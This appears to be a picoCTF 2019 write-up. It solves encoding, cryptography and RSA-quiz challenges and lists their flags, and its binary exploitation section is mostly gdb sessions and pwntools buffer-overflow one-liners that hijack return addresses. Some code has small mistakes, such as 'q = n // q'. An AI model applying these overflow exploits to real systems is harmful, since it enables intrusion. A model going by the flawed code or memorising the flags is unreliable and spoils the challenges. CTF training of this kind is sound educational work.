# Pico CTF 2019

Challenge Category Points
2Warm General Skills 50
Lets Warm Up General Skills 50
Warmed Up General Skills 50
Bases General Skills 100
First Grep General Skills 100
Resources General Skills 100
strings it General Skills 100
What’s a net cat? General Skills 100
Based General Skills 200
OverFlow 0 Binary Exploitation 50
OverFlow 1 Binary Exploitation 150
OverFlow 2 Binary Exploitation 250
NewOverFlow-1 Binary Exploitation 200
NewOverFlow-2 Binary Exploitation 250
The Numbers Cryptography 50
13 Cryptography 100
Easy1 Cryptography 100
Caesar Cryptography 100
Flags Cryptography 200
Mr-Worldwide Cryptography 200
Tapping Cryptography 200
La Cifra De Cryptography 200
RSA Pop Quiz Cryptography 200
MiniRSA Cryptography 300
waves over lambda Cryptography 300
b00tl3gRSA2 Cryptography 400
b00tl3gRSA3 Cryptography 450
john_pollard Cryptography 500
unzip Forensics 50
So Meta Forensics 150
What Lies Within Forensics 150
extensions Forensics 150
WhitePages Forensics 250
m00nwalk Forensics 200
pastaAAA Forensics 300
Insp3ct0r Web 50
dont-use-client-side Web 100
where are the robots Web 100
Client-side-again Web 200
picobrowser Web 200
Java Script Kiddie Web 400
Java Script Kiddie 2 Web 550

# General Skills

### 2Warm

#### Points: 50

Can you convert the number 42 (base 10) to binary (base 2)?

>>> "{0:b}".format(42)
"101010"


### Lets Warm Up

#### Points: 50

If I told you a word started with 0x70 in hexadecimal, what would it start with in ASCII?

chr(0x70)

'p'


picoCTF{p}

### Warmed Up

#### Points: 50

What is 0x3D (base 16) in decimal (base 10).

>>> 0x3D
61


picoCTF{61}

### Bases

#### Points: 100

What does this bDNhcm5fdGgzX3IwcDM1 mean? I think it has something to do with bases.

Decode from base64 to find

echo bDNhcm5fdGgzX3IwcDM1 | base64 --decode
l3arn_th3_r0p35


picoCTF{l3arn_th3_r0p35}

### First Grep

#### Points: 100

Teaching you to use grep to find the flag. Lets find all instances of “pico” in the file

grep -e "pico" file.dms
picoCTF{grep_is_good_to_find_things_5f0c3d9e}


picoCTF{grep_is_good_to_find_things_5f0c3d9e}

### Resources

#### Points: 100

and grab the flag

picoCTF{r3source_pag3_f1ag} (2019 competition)

### strings it

#### Points: 100

Can you find the flag in file without running it? You can also find the file in /problems/strings-it_3_d2b2eb25dc5e3f3625810131832de295 on the shell server.

strings strings.dms
picoCTF{5tRIng5_1T_30be4706}


picoCTF{5tRIng5_1T_30be4706}

### what’s a net cat?

#### Points: 100

Using netcat (nc) is going to be pretty important. Can you connect to 2019shell1.picoctf.com at port 12265 to get the flag?

Jack: ~$nc 2019shell1.picoctf.com 12265 You're on your way to becoming the net cat master picoCTF{nEtCat_Mast3ry_589c8b71}  ### Based #### Points: 200 To get truly 1337, you must understand different data encodings, such as hexadecimal or binary. Can you get the flag from this program to prove you are on the way to becoming 1337? Connect with nc 2019shell1.picoctf.com 20836. Let us see how data is stored Please give the 01101100 01100001 01101101 01110000 as a word. ... you have 45 seconds..... Input: lamp Please give me the 163 164 162 145 145 164 as a word. Input: street Please give me the 6f76656e as a word. Input: oven You've beaten the challenge Flag: picoCTF{learning_about_converting_values_2360e4dd}  picoCTF{learning_about_converting_values_2360e4dd} # Binary Exploitation ### OverFlow 0 #### Points: 50 #include <stdio.h> #include <stdlib.h> #include <string.h> #include <signal.h> #define FLAGSIZE_MAX 64 char flag[FLAGSIZE_MAX]; void sigsegv_handler(int sig) { fprintf(stderr, "%s\n", flag); fflush(stderr); exit(1); } void vuln(char *input){ char buf[128]; strcpy(buf, input); } int main(int argc, char **argv){ FILE *f = fopen("flag.txt","r"); if (f == NULL) { printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n"); exit(0); } fgets(flag,FLAGSIZE_MAX,f); signal(SIGSEGV, sigsegv_handler); gid_t gid = getegid(); setresgid(gid, gid, gid); if (argc > 1) { vuln(argv[1]); printf("You entered: %s", argv[1]); } else printf("Please enter an argument next time\n"); return 0; }  Run ./vuln python -c "print 'A'*1000"  picoCTF{3asY_P3a5y8645475a} ### OverFlow 1 #### Points: 150 #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include "asm.h" #define BUFFSIZE 64 #define FLAGSIZE 64 void flag() { char buf[FLAGSIZE]; FILE *f = fopen("flag.txt","r"); if (f == NULL) { printf("Flag File is Missing. please contact an Admin if you are running this on the shell server.\n"); exit(0); } fgets(buf,FLAGSIZE,f); printf(buf); } void vuln(){ char buf[BUFFSIZE]; gets(buf); printf("Woah, were jumping to 0x%x !\n", get_return_address()); } int main(int argc, char **argv){ setvbuf(stdout, NULL, _IONBF, 0); gid_t gid = getegid(); setresgid(gid, gid, gid); puts("Give me a string and lets see what happens: "); vuln(); return 0; }  Sending a bunch of data to jack4818@pico-2019-shell1:/problems/overflow-1_1_3039944758e6085624f51d62226d3c13$ python -c "print 'A'*(100)" | ./vuln
Give me a string and lets see what happens:
Woah, were jumping to 0x41414141 !


So we see that we are able to overwrite the return address by sending a very long string. To find the correct offset we use

jack4818@pico-2019-shell1:/problems/overflow-1_1_3039944758e6085624f51d62226d3c13$cyclic 200 | ./vuln Give me a string and lets see what happens: Woah, were jumping to 0x61616174 ! Segmentation fault (core dumped) jack4818@pico-2019-shell1:/problems/overflow-1_1_3039944758e6085624f51d62226d3c13$ cyclic -l 0x61616174
76


Now we know the offset, we need the address of the function flag()

jack4818@pico-2019-shell1:/problems/overflow-1_1_3039944758e6085624f51d62226d3c13$gdb ./vuln (gdb) info address flag Symbol "flag" is at 0x80485e6 in a file compiled without debugging.  With the buffer size and the address, we can now call the function jack4818@pico-2019-shell1:/problems/overflow-1_1_3039944758e6085624f51d62226d3c13$ python -c "from pwn import *; print 'A'*(76)+p32(0x80485e6)" | ./vuln
Give me a string and lets see what happens:
Woah, were jumping to 0x80485e6 !


picoCTF{n0w_w3r3_ChaNg1ng_r3tURn56b6d6d97}

### OverFlow 2

#### Points: 250

Now try overwriting arguments. Can you get the flag from this program? You can find it in /problems/overflow-2_2_fc3395ae58774b9c251598a8e4bea2e0 on the shell server. Source.

Source code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 176
#define FLAGSIZE 64

void flag(unsigned int arg1, unsigned int arg2) {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
exit(0);
}

fgets(buf,FLAGSIZE,f);
return;
if (arg2 != 0xC0DED00D)
return;
printf(buf);
}

void vuln(){
char buf[BUFSIZE];
gets(buf);
puts(buf);
}

int main(int argc, char **argv){

setvbuf(stdout, NULL, _IONBF, 0);

gid_t gid = getegid();
setresgid(gid, gid, gid);

vuln();
return 0;
}


The aim is to overflow and send flag(0xDEADBEEF,0xC0DED00D)

Like the last challenge, using gdb we can find the address of flag()

$gdb ./vuln (gdb) info address flag Symbol "flag" is at 0x80485e6 in a file compiled without debugging.  To find the offset, we can run vuln in gdb to get the seg fault when we send in 1000 characters of cyclic Jack: ~$ cyclic 1000


Program received signal SIGSEGV, Segmentation fault. 0x62616177 in ?? ()

The offset is then found

$cyclic -l 0x62616177 188  #### Exploit With the offset, we send the address of flag function: 0x80485e6, followed by 4 bytes to pad the second return address and then include our two arguments: 0xDEADBEEF, 0xC0DED00D Put togther, we have $ python -c "from pwn import *; print 'A'*(188)+p32(0x80485e6)+'A'*4+p32(0xDEADBEEF)+p32(0xC0DED00D)" | ./vuln

picoCTF{arg5_and_r3turn5dc972417}

### NewOverFlow-1

#### Points: 200

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFFSIZE 64
#define FLAGSIZE 64

void flag() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("'flag.txt' missing in the current directory!\n");
exit(0);
}

fgets(buf,FLAGSIZE,f);
printf(buf);
}

void vuln(){
char buf[BUFFSIZE];
gets(buf);
}

int main(int argc, char **argv){

setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Welcome to 64-bit. Give me a string that gets you the flag: ");
vuln();
return 0;
}


Another overflow challenge. This time we’re working with a 64bit machine. To return the function flag() we will need two things:

• The offset for the return address
• The return address of the function flag

#### Offset

To calculate the offset, lets grab 1000 characters from cyclic

Jack: ~$cyclic 1000 aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaaj  We start up gdb. Lets disassemble vuln and set a breakpoint at the input of our string disassemble vuln Dump of assembler code for function vuln: 0x00000000004007cc <+0>: push %rbp 0x00000000004007cd <+1>: mov %rsp,%rbp 0x00000000004007d0 <+4>: sub$0x40,%rsp
0x00000000004007d4 <+8>:	lea    -0x40(%rbp),%rax
0x00000000004007d8 <+12>:	mov    %rax,%rdi
0x00000000004007db <+15>:	mov    $0x0,%eax 0x00000000004007e0 <+20>: callq 0x400630 <gets@plt> 0x00000000004007e5 <+25>: nop 0x00000000004007e6 <+26>: leaveq 0x00000000004007e7 <+27>: retq End of assembler dump.  break * vuln+20 Breakpoint 1 at 0x4007e0  We identify the addresses of rsp and rbp. (gdb) x$rsp
0x7ffd5ab97a30:	0x0000003c
(gdb) x $rbp 0x7ffd5ab97a70: 0x5ab97aa0  0x7ffd5ab97a70 will help us find the int from cyclic to identify. Lets dump 120 hexadecimal addresses from the address of rsp (gdb) x/120x$rsp
0x7ffd5ab97a30:	0x61616161	0x61616162	0x61616163	0x61616164
0x7ffd5ab97a40:	0x61616165	0x61616166	0x61616167	0x61616168
0x7ffd5ab97a50:	0x61616169	0x6161616a	0x6161616b	0x6161616c
0x7ffd5ab97a60:	0x6161616d	0x6161616e	0x6161616f	0x61616170
0x7ffd5ab97a70:	0x61616171	0x61616172	0x61616173	0x61616174
0x7ffd5ab97a80:	0x61616175	0x61616176	0x61616177	0x61616178
0x7ffd5ab97a90:	0x61616179	0x6261617a	0x62616162	0x62616163
0x7ffd5ab97aa0:	0x62616164	0x62616165	0x62616166	0x62616167
0x7ffd5ab97ab0:	0x62616168	0x62616169	0x6261616a	0x6261616b
0x7ffd5ab97ac0:	0x6261616c	0x6261616d	0x6261616e	0x6261616f
0x7ffd5ab97ae0:	0x62616174	0x62616175	0x62616176	0x62616177
0x7ffd5ab97af0:	0x62616178	0x62616179	0x6361617a	0x63616162
0x7ffd5ab97b00:	0x63616163	0x63616164	0x63616165	0x63616166
0x7ffd5ab97b10:	0x63616167	0x63616168	0x63616169	0x6361616a
0x7ffd5ab97b20:	0x6361616b	0x6361616c	0x6361616d	0x6361616e
0x7ffd5ab97b30:	0x6361616f	0x63616170	0x63616171	0x63616172
0x7ffd5ab97b40:	0x63616173	0x63616174	0x63616175	0x63616176
0x7ffd5ab97b50:	0x63616177	0x63616178	0x63616179	0x6461617a
0x7ffd5ab97b60:	0x64616162	0x64616163	0x64616164	0x64616165
0x7ffd5ab97b70:	0x64616166	0x64616167	0x64616168	0x64616169
0x7ffd5ab97b80:	0x6461616a	0x6461616b	0x6461616c	0x6461616d
0x7ffd5ab97b90:	0x6461616e	0x6461616f	0x64616170	0x64616171
0x7ffd5ab97ba0:	0x64616172	0x64616173	0x64616174	0x64616175
0x7ffd5ab97bb0:	0x64616176	0x64616177	0x64616178	0x64616179
0x7ffd5ab97bc0:	0x6561617a	0x65616162	0x65616163	0x65616164
0x7ffd5ab97bd0:	0x65616165	0x65616166	0x65616167	0x65616168
0x7ffd5ab97be0:	0x65616169	0x6561616a	0x6561616b	0x6561616c
0x7ffd5ab97bf0:	0x6561616d	0x6561616e	0x6561616f	0x65616170
0x7ffd5ab97c00:	0x65616171	0x65616172	0x65616173	0x65616174


Now we can calculate the offset

Jack: ~cyclic -l 0x61616173 72  #### Function address (gdb) info address flag Symbol "flag" is at 0x400767 in a file compiled without debugging.  There is some alignment issue, and the correct address is 0x400767. Apparently this is to do with Ubuntu 18.04. I don’t know. #### Exploit As we know the offset and the function address, we can use overflow to point to the function flag and print out the flag python -c "from pwn import *; print 'A'*(72)+p64(0x400768)" | ./vuln  picoCTF{th4t_w4snt_t00_d1ff3r3nt_r1ghT?_351346a2} ### NewOverFlow-2 #### Points: 250 So while reading the source of this challenge #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <stdbool.h> #define BUFFSIZE 64 #define FLAGSIZE 64 bool win1 = false; bool win2 = false; void win_fn1(unsigned int arg_check) { if (arg_check == 0xDEADBEEF) { win1 = true; } } void win_fn2(unsigned int arg_check1, unsigned int arg_check2, unsigned int arg_check3) { if (win1 && \ arg_check1 == 0xBAADCAFE && \ arg_check2 == 0xCAFEBABE && \ arg_check3 == 0xABADBABE) { win2 = true; } } void win_fn() { char flag[48]; FILE *file; file = fopen("flag.txt", "r"); if (file == NULL) { printf("'flag.txt' missing in the current directory!\n"); exit(0); } fgets(flag, sizeof(flag), file); if (win1 && win2) { printf("%s", flag); return; } else { printf("Nope, not quite...\n"); } } void flag() { char buf[FLAGSIZE]; FILE *f = fopen("flag.txt","r"); if (f == NULL) { printf("'flag.txt' missing in the current directory!\n"); exit(0); } fgets(buf,FLAGSIZE,f); printf(buf); } void vuln(){ char buf[BUFFSIZE]; gets(buf); } int main(int argc, char **argv){ setvbuf(stdout, NULL, _IONBF, 0); gid_t gid = getegid(); setresgid(gid, gid, gid); puts("Welcome to 64-bit. Can you match these numbers?"); vuln(); return 0; }  I noticed an error in the challenge. The flag is loaded into win_fn() which is the intended solution, but it’s also loaded into the function flag() void flag() { char buf[FLAGSIZE]; FILE *f = fopen("flag.txt","r"); if (f == NULL) { printf("'flag.txt' missing in the current directory!\n"); exit(0); } fgets(buf,FLAGSIZE,f); printf(buf); }  Unlike win_fn() this has no logical arguments and we can simply call it, exactly like the previous challenge… The offset was found to be 72, and gdb points to the flag function (gdb) info address flag Symbol "flag" is at 0x40084d in a file compiled without debugging.  So we can simply collect the flag, after fixing the flag pointer, and win the challenge. python -c "from pwn import *; print 'A'*(72)+p64(0x40084e)" | ./vuln Welcome to 64-bit. Can you match these numbers? picoCTF{r0p_1t_d0nT_st0p_1t_b3358018} Segmentation fault (core dumped)  picoCTF{r0p_1t_d0nT_st0p_1t_b3358018} # Cryptography ### The Numbers #### Points: 50 The numbers… what do they mean? File contains 16 9 3 15 3 20 6 20 8 5 14 21 13 2 5 18 19 13 1 19 15 14 Converting the numbers to letters using: a-z = 1-26: P I C O C T F T H E N U M B E R S M A S O N PICOCTF{THENUMBERSMASON} ### 13 #### Points: 100 ROT13 on the file: cvpbPGS{abg_gbb_onq_bs_n_ceboyrz} picoCTF{not_too_bad_of_a_problem}  ### Easy1 #### Points: 100 We are given the cipher UFJKXQZQUNB and the key SOLVECRYPTO. The table given is the Vigenere table, using it we obtain the flag picoCTF{CRYPTOISFUN} ### Caesar #### Points: 100 Trial and error through to find that rot7 is the correct decryption. picoCTF{vkhllbgzmaxknubvhglzeipcie} picoCTF{crossingtherubiconsglpwjpl}  ### Flags #### Points: 200 The flag is encoded using Nautical Flags PICOCTF{F1AG5AND5TUFF} ### Mr-Worldwide Points: 200 picoCTF{(35.028309, 135.753082)(46.469391, 30.740883)(39.758949, -84.191605)(41.015137, 28.979530)(24.466667, 54.366669)(3.140853, 101.693207)_(9.005401, 38.763611)(-3.989038, -79.203560)(52.377956, 4.897070)(41.085651, -73.858467)(57.790001, -152.407227)(31.205753, 29.924526)} Each pair of numbers are coordinates. The coordinates give the following cities KAMIGYO ODESA DAYTON ISTANBUL ABU DHABI KUALA LUMPUA _ ADDIS ABABA Loja Amsterdam SLEEPY HOLLOW Kodiak Alexandria  Taking the first letter of each of the cities gives the flag picoCTF{KODIAK_ALASKA} ### Tapping #### Points: 200 Theres tapping coming in from the wires. What’s it saying nc 2019shell1.picoctf.com 45617. Connecting to the port we recieve .--. .. -.-. --- -.-. - ..-. { -- ----- .-. ... ...-- -.-. ----- -.. ...-- .---- ... ..-. ..- -. ...-- ..... ..--- ....- ----. ....- -.... ....- --... .---- }  Decoding as morse gives the flag PICOCTF{M0RS3C0D31SFUN3524946471} ### La Cifra De ### Points 200 nc 2019shell2.picoctf.com 60147 Ne iy nytkwpsznyg nth it mtsztcy vjzprj zfzjy rkhpibj nrkitt ltc tnnygy ysee itd tte cxjltk Ifrosr tnj noawde uk siyyzre, yse Bnretèwp Cousex mls hjpn xjtnbjytki xatd eisjd Iz bls lfwskqj azycihzeej yz Brftsk ip Volpnèxj ls oy hay tcimnyarqj dkxnrogpd os 1553 my Mnzvgs Mazytszf Merqlsu ny hox moup Wa inqrg ipl. Ynr. Gotgat Gltzndtg Gplrfdo Ltc tnj tmvqpmkseaznzn uk ehox nivmpr g ylbrj ts ltcmki my yqtdosr tnj wocjc hgqq ol fy oxitngwj arusahje fuw ln guaaxjytrd catizm tzxbkw zf vqlckx hizm ceyupcz yz tnj fpvjc hgqqpohzCZK{m311a50_0x_a1rn3x3_h1ah3x8j3m3a15} Zmp fowdt cjwl-jtnusjytki oeyhcivytot tq a vtwygqahggptoh nivmpr nthebjc, wgx xajj lruzyd 1467 hd Weus Mazytszf Llhjcto. Yse Bnretèwp Cousex nd tnjceltce ytxeznxey hllrjo tnj Llhjcto Itsi tc Argprzn Nivmpr. Os 1508, Uonfynkx Eroysesnfs osgetypd zmp su-hllrjo tggflg wpczf (l mgycid tq snnqtki llvmlbkyd) tnfe wuzwd rfeex gp a iwttohll itxpuspnz tq tnj Gimjyèrk Htpnjc. Bkqwayt’d skhznj gzoqqpt guaegwpd os 1555 ls g hznznyugytot tq tnj qixxe. Tnj wocjc hgqgey tq tnj llvmlbkyd axj yoc xsilypd xjrurfcle, gft zmp arusahjes gso tnj tnjji lkyeexx lrk rtxki my sjlny tq a sspmustc qjj pnwlsk, bsiim nat gp dokqexjyt cneh kfnh itcrkxaotipnz.  Which we can decode using Vigenere, with the key “flag” It is interesting how in history people often receive credit for things they did not create During the course of history, the Vigenère Cipher has been reinvented many times It was falsely attributed to Blaise de Vigenère as it was originally described in 1553 by Giovan Battista Bellaso in his book La cifra del. Sig. Giovan Battista Bellaso For the implementation of this cipher a table is formed by sliding the lower half of an ordinary alphabet for an apparently random number of places with respect to the upper halfpicoCTF{b311a50_0r_v1gn3r3_c1ph3r8e3b3a15} The first well-documented description of a polyalphabetic cipher however, was made around 1467 by Leon Battista Alberti. The Vigenère Cipher is therefore sometimes called the Alberti Disc or Alberti Cipher. In 1508, Johannes Trithemius invented the so-called tabula recta (a matrix of shifted alphabets) that would later be a critical component of the Vigenère Cipher. Bellaso’s second booklet appeared in 1555 as a continuation of the first. The lower halves of the alphabets are now shifted regularly, but the alphabets and the index letters are mixed by means of a mnemonic key phrase, which can be different with each correspondent.  picoCTF{b311a50_0r_v1gn3r3_c1ph3r8e3b3a15} ### RSA Pop Quiz ### Points: 200 Class, take your seats! It’s PRIME-time for a quiz… nc 2019shell1.picoctf.com 49989 ### Introduction Good morning class! It’s me Ms. Adleman-Shamir-Rivest Today we will be taking a pop quiz, so I hope you studied. Cramming just will not do! You will need to tell me if each example is possible, given your extensive crypto knowledge. Inputs and outputs are in decimal. No hex here! ### Question 1 NEW PROBLEM q : 60413 p : 76753 PRODUCE THE FOLLOWING n IS THIS POSSIBLE and FEASIBLE? (Y/N) Here we are asked to calculate the modulus n, given p,q. As n = pq this is feasible and we find that  n = pq = 60413 \times 76753 = 4636878989  Using python p = 60413 q = 76753 n = p*q print(n) 4636878989  ### Question 2 NEW PROBLEM p : 54269 n : 5051846941 PRODUCE THE FOLLOWING q IS THIS POSSIBLE and FEASIBLE? (Y/N): Here we are asked to find the prime q, given the modulus n and prime p. This is feasible as we can recover q from division.  q = \frac{n}{p} = \frac{5051846941}{54269} = 93089  Using python p = 54269 n = 5051846941 q = n//p print(q) 93089  ### Question 3 NEW PROBLEM e : 3 n : 12738162802910546503821920886905393316386362759567480839428456525224226445173031635306683726182522494910808518920409019414034814409330094245825749680913204566832337704700165993198897029795786969124232138869784626202501366135975223827287812326250577148625360887698930625504334325804587329905617936581116392784684334664204309771430814449606147221349888320403451637882447709796221706470239625292297988766493746209684880843111138170600039888112404411310974758532603998608057008811836384597579147244737606088756299939654265086899096359070667266167754944587948695842171915048619846282873769413489072243477764350071787327913 PRODUCE THE FOLLOWING q p IS THIS POSSIBLE and FEASIBLE? (Y/N): Here we are given the public key (n,e). Although e is small, and potentially the RSA encryption may be weak to an attack, we cannot factor n in a reasonable time and so this is not feasible. ### Question 4 NEW PROBLEM q : 66347 p : 12611 #PRODUCE THE FOLLOWING totient(n) IS THIS POSSIBLE and FEASIBLE? (Y/N): Here we are asked to calculate the totient of n given two primes p,q. This is feasible. We use the standard realtion:  \phi(n) = (p-1)(q-1) = 836623060  Using python p = 12611 q = 66347 phi = (p-1)*(q-1) print(phi) 836623060  ### Question 5 NEW PROBLEM plaintext : 6357294171489311547190987615544575133581967886499484091352661406414044440475205342882841236357665973431462491355089413710392273380203038793241564304774271529108729717 e : 3 n : 29129463609326322559521123136222078780585451208149138547799121083622333250646678767769126248182207478527881025116332742616201890576280859777513414460842754045651093593251726785499360828237897586278068419875517543013545369871704159718105354690802726645710699029936754265654381929650494383622583174075805797766685192325859982797796060391271817578087472948205626257717479858369754502615173773514087437504532994142632207906501079835037052797306690891600559321673928943158514646572885986881016569647357891598545880304236145548059520898133142087545369179876065657214225826997676844000054327141666320553082128424707948750331 #PRODUCE THE FOLLOWING ciphertext IS THIS POSSIBLE and FEASIBLE? (Y/N): We are now being asked to encrypt the message m to produce the ciphertext c. As we are given both the modulus m and the exponent e, we can perform the encryption in the standard way and so this is feasible.  c = m^e \mod n  Using python m = 6357294171489311547190987615544575133581967886499484091352661406414044440475205342882841236357665973431462491355089413710392273380203038793241564304774271529108729717 n = 29129463609326322559521123136222078780585451208149138547799121083622333250646678767769126248182207478527881025116332742616201890576280859777513414460842754045651093593251726785499360828237897586278068419875517543013545369871704159718105354690802726645710699029936754265654381929650494383622583174075805797766685192325859982797796060391271817578087472948205626257717479858369754502615173773514087437504532994142632207906501079835037052797306690891600559321673928943158514646572885986881016569647357891598545880304236145548059520898133142087545369179876065657214225826997676844000054327141666320553082128424707948750331 e = 3 c = pow(m,e,n) print(c) 256931246631782714357241556582441991993437399854161372646318659020994329843524306570818293602492485385337029697819837182169818816821461486018802894936801257629375428544752970630870631166355711254848465862207765051226282541748174535990314552471546936536330397892907207943448897073772015986097770443616540466471245438117157152783246654401668267323136450122287983612851171545784168132230208726238881861407976917850248110805724300421712827401063963117423718797887144760360749619552577176382615108244813  ### Question 6 NEW PROBLEM ciphertext : 107524013451079348539944510756143604203925717262185033799328445011792760545528944993719783392542163428637172323512252624567111110666168664743115203791510985709942366609626436995887781674651272233566303814979677507101168587739375699009734588985482369702634499544891509228440194615376339573685285125730286623323 e : 3 n : 27566996291508213932419371385141522859343226560050921196294761870500846140132385080994630946107675330189606021165260590147068785820203600882092467797813519434652632126061353583124063944373336654246386074125394368479677295167494332556053947231141336142392086767742035970752738056297057898704112912616565299451359791548536846025854378347423520104947907334451056339439706623069503088916316369813499705073573777577169392401411708920615574908593784282546154486446779246790294398198854547069593987224578333683144886242572837465834139561122101527973799583927411936200068176539747586449939559180772690007261562703222558103359 PRODUCE THE FOLLOWING plaintext IS THIS POSSIBLE and FEASIBLE? (Y/N) Here we are asked to decrypt a message but we are only given the public key (n,e). Therefore it is not feasible to find the plaintext m. ### Question 7 NEW PROBLEM q : 92092076805892533739724722602668675840671093008520241548191914215399824020372076186460768206814914423802230398410980218741906960527104568970225804374404612617736579286959865287226538692911376507934256844456333236362669879347073756238894784951597211105734179388300051579994253565459304743059533646753003894559 p : 97846775312392801037224396977012615848433199640105786119757047098757998273009741128821931277074555731813289423891389911801250326299324018557072727051765547115514791337578758859803890173153277252326496062476389498019821358465433398338364421624871010292162533041884897182597065662521825095949253625730631876637 e : 65537 PRODUCE THE FOLLOWING d IS THIS POSSIBLE and FEASIBLE? (Y/N) We are now asked to find the modular multiplicative inverse d given the two primes p,q and e. This is feasible as using p,q we can caluclate \phi(n) and using (\phi(n),e) we can find d. Using python from Crypto.Util.number import inverse p = 97846775312392801037224396977012615848433199640105786119757047098757998273009741128821931277074555731813289423891389911801250326299324018557072727051765547115514791337578758859803890173153277252326496062476389498019821358465433398338364421624871010292162533041884897182597065662521825095949253625730631876637 q = 92092076805892533739724722602668675840671093008520241548191914215399824020372076186460768206814914423802230398410980218741906960527104568970225804374404612617736579286959865287226538692911376507934256844456333236362669879347073756238894784951597211105734179388300051579994253565459304743059533646753003894559 phi = (p-1)*(q-1) d = inverse(e,phi) print(d) 1405046269503207469140791548403639533127416416214210694972085079171787580463776820425965898174272870486015739516125786182821637006600742140682552321645503743280670839819078749092730110549881891271317396450158021688253989767145578723458252769465545504142139663476747479225923933192421405464414574786272963741656223941750084051228611576708609346787101088759062724389874160693008783334605903142528824559223515203978707969795087506678894006628296743079886244349469131831225757926844843554897638786146036869572653204735650843186722732736888918789379054050122205253165705085538743651258400390580971043144644984654914856729  ### Question 8 NEW PROBLEM p : 153143042272527868798412612417204434156935146874282990942386694020462861918068684561281763577034706600608387699148071015194725533394126069826857182428660427818277378724977554365910231524827258160904493774748749088477328204812171935987088715261127321911849092207070653272176072509933245978935455542420691737433 ciphertext : 9200910993991342245635775242884295171331638486293398612829324409189786924964269448402231033692571666846582772547678361933884560304465448930040982507936200701552729919507681097344114739434382503801935689147981369024180959865358948150771814009412646368907358482273874756410640420832989566791308787895283057047604985049071797817308263226498433025719101414595141020534960745847160087741791305232083441121028428567136619357775442961508547402267425797890689191622526865196136020253867164299721963231711821169972573934532328410089925473599566951143246364545922038720537045119212022769806144414268754234300461988702406805390 e : 65537 n : 23952937352643527451379227516428377705004894508566304313177880191662177061878993798938496818120987817049538365206671401938265663712351239785237507341311858383628932183083145614696585411921662992078376103990806989257289472590902167457302888198293135333083734504191910953238278860923153746261500759411620299864395158783509535039259714359526738924736952759753503357614939203434092075676169179112452620687731670534906069845965633455748606649062394293289967059348143206600765820021392608270528856238306849191113241355842396325210132358046616312901337987464473799040762271876389031455051640937681745409057246190498795697239 #PRODUCE THE FOLLOWING plaintext IS THIS POSSIBLE and FEASIBLE? (Y/N) Here we are given a ciphertext c to decode. As we are given (n,p) we can find q. As we are given p,q,e we can find d. As we have c,d,n we can find the plaintext m and so this is feasible. from Crypto.Util.number import inverse c = 9200910993991342245635775242884295171331638486293398612829324409189786924964269448402231033692571666846582772547678361933884560304465448930040982507936200701552729919507681097344114739434382503801935689147981369024180959865358948150771814009412646368907358482273874756410640420832989566791308787895283057047604985049071797817308263226498433025719101414595141020534960745847160087741791305232083441121028428567136619357775442961508547402267425797890689191622526865196136020253867164299721963231711821169972573934532328410089925473599566951143246364545922038720537045119212022769806144414268754234300461988702406805390 n = 23952937352643527451379227516428377705004894508566304313177880191662177061878993798938496818120987817049538365206671401938265663712351239785237507341311858383628932183083145614696585411921662992078376103990806989257289472590902167457302888198293135333083734504191910953238278860923153746261500759411620299864395158783509535039259714359526738924736952759753503357614939203434092075676169179112452620687731670534906069845965633455748606649062394293289967059348143206600765820021392608270528856238306849191113241355842396325210132358046616312901337987464473799040762271876389031455051640937681745409057246190498795697239 e = 65537 p = 153143042272527868798412612417204434156935146874282990942386694020462861918068684561281763577034706600608387699148071015194725533394126069826857182428660427818277378724977554365910231524827258160904493774748749088477328204812171935987088715261127321911849092207070653272176072509933245978935455542420691737433 q = n // q phi = (p-1)*(q-1) d = inverse(e,phi) m = pow(c,d,n) 14311663942709674867122208214901970650496788151239520971623411712977119737614436391696347773  ### Question 9 If you convert the last plaintext to a hex number, then ascii, you’ll find what you need! ;) Given the integer from the plaintext, we convert the integer into base 16 and then decode the resulting string as ascii text m = 14311663942709674867122208214901970650496788151239520971623411712977119737614436391696347773 x = (bytes.fromhex(format(m,'x'))).decode('utf-8') picoCTF{wA8_th4t_ill3aGal..o6e437df2}


### MiniRSA

#### Points: 300

This RSA challenge is solved by noticing that n is a very large integer, while the cipher text is relatively small and the exponent is e=3. If the plaintext is unpadded, there’s a good change we can recover the message by taking the cube root of c.

I used mathematica for this because I’m lazy, but there are tutorials online for accurate calculations of cube roots.

c = 2205316413931134031074603746928247799030155221252519872650090188613452564237125578465730267259964004717502122380246206889902726277183873277327660628860571110294829824875203511275589025377840116767106200804425285036496482998467992009084773

m = c^{1/3}

